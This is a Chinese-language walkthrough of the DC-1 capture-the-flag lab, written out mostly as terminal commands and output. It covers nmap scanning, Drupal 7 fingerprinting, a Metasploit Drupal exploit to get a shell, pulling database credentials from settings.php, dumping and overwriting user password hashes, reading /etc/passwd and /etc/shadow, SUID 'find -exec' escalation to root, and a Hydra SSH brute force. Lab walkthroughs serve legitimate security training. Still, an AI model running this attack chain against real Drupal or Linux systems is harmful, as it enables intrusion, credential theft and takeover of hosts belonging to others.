渗透测试的一个完整流程
dc-1
黑盒测试:
漏洞,cms版本,----信息
过程:
信息收集---漏洞探测---验证---爆破---提权---登录
5个flag
nmap工具
nmap -sP 192.168.88.142/24
dc-1靶机IP
192.168.88.146
拿到IP查看端头
nmap -A 扫描开放端口
sql注入
目录扫描
信息泄露
常见的cms扫描
找到cms版本whatweb -v 192.168.88.146(kail)
Drupal 7
或者火狐插件wappalyzer(指纹识别)
去drupal漏洞利用
msfconsole(kail)
search drupal
use 0-7(任意一个)
查看配置
show options(主要看rhosts为目标的IP地址)
添加目标IP地址
set rhosts 192.167.88.146
然后run
meterpreter (进入后渗透模块)
sysinfo(查看基本信息)
建立反向shell
shell
python -c 'import pty;pty.spawn("/bin/bash")'
进去终端后 ls
找到flag1
cat flag1.txt
Every good CMS needs a config file - and so do you.
根据提示查找配置文件
继续ls sites(站点)
README.txt all default example.sites.php
ls sites/default
ls sites/default
default.settings.php files settings.php(配置文件)
cat settings.php
找到flag2
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
进入数据库 mysql -udbuser -pR0ck3t
show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.00 sec)
use drupaldb;
use drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)
发现users(高危表名)
ysql> select*from users;
select*from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)
mysql> select*from users\G;(\G将查找到的变成纵向)
select*from users\G;
*************************** 1. row ***************************
uid: 0
name:
pass:
mail:
theme:
signature:
signature_format: NULL
created: 0
access: 0
login: 0
status: 0
timezone: NULL
language:
picture: 0
init:
data: NULL
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: admin@example.com
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: admin@example.com
data: b:0;
*************************** 3. row ***************************
uid: 2
name: Fred
pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
mail: fred@example.org
theme:
signature:
signature_format: filtered_html
created: 1550581952
access: 1550582225
login: 1550582225
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: fred@example.org
data: b:0;
3 rows in set (0.00 sec)
得到账号和密码
密码是加密的
返回www-data@DC-1:/var/www$
find -name "*hash*"
./scripts/password-hash.sh
./scripts/password-hash.sh 123456(查看123456的hash)
$S$DX6mS92o4EFQyd4inDWiO9SUwu09uSTuEJH2OG7zn6B1FOA063Rq
再次进入数据库
修改uid 的密码为123456
登录网站
找到flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
www-data@DC-1:/var/www$ cat /etc/passwd
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
www-data@DC-1:/var/www$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
flag4
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
没有权限访问时用
find / -perm -u=s -type f 2>/dev/null
find / -exec "/bin/bash" -p \;
find 指令
/ 根目录(查找位置)
-perm 权限
-u 用户(s=特权)
f 文件
2>/dev/null 过滤错误信息
flag5
thefinalflag.txt
cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
bash-4.2# cd /root
cd /root
bash-4.2# ls
ls
thefinalflag.txt
bash-4.2# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
bash-4.2#
hydra 九头蛇
cat /user/share/john/password.lst(kali字典存放路径)
hydra -l flag4 -P /usr/share/john/password.lst 192.168.88.146 ssh -vV -f
(爆破)
host: 192.168.88.146 login: flag4 password: orange
[STATUS] attack finished for 192.168.88.146 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-01 00:59:21
得到密码登录
ssh flag4@192.168.88.146
The authenticity of host '192.168.88.146 (192.168.88.146)' can't be established.
ECDSA key fingerprint is SHA256:89B+YqcNl4cSf/BZk26MQG1QeW4BvBlVENMbTRhVhsU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.88.146' (ECDSA) to the list of known hosts.
flag4@192.168.88.146's password:
Permission denied, please try again.
flag4@192.168.88.146's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$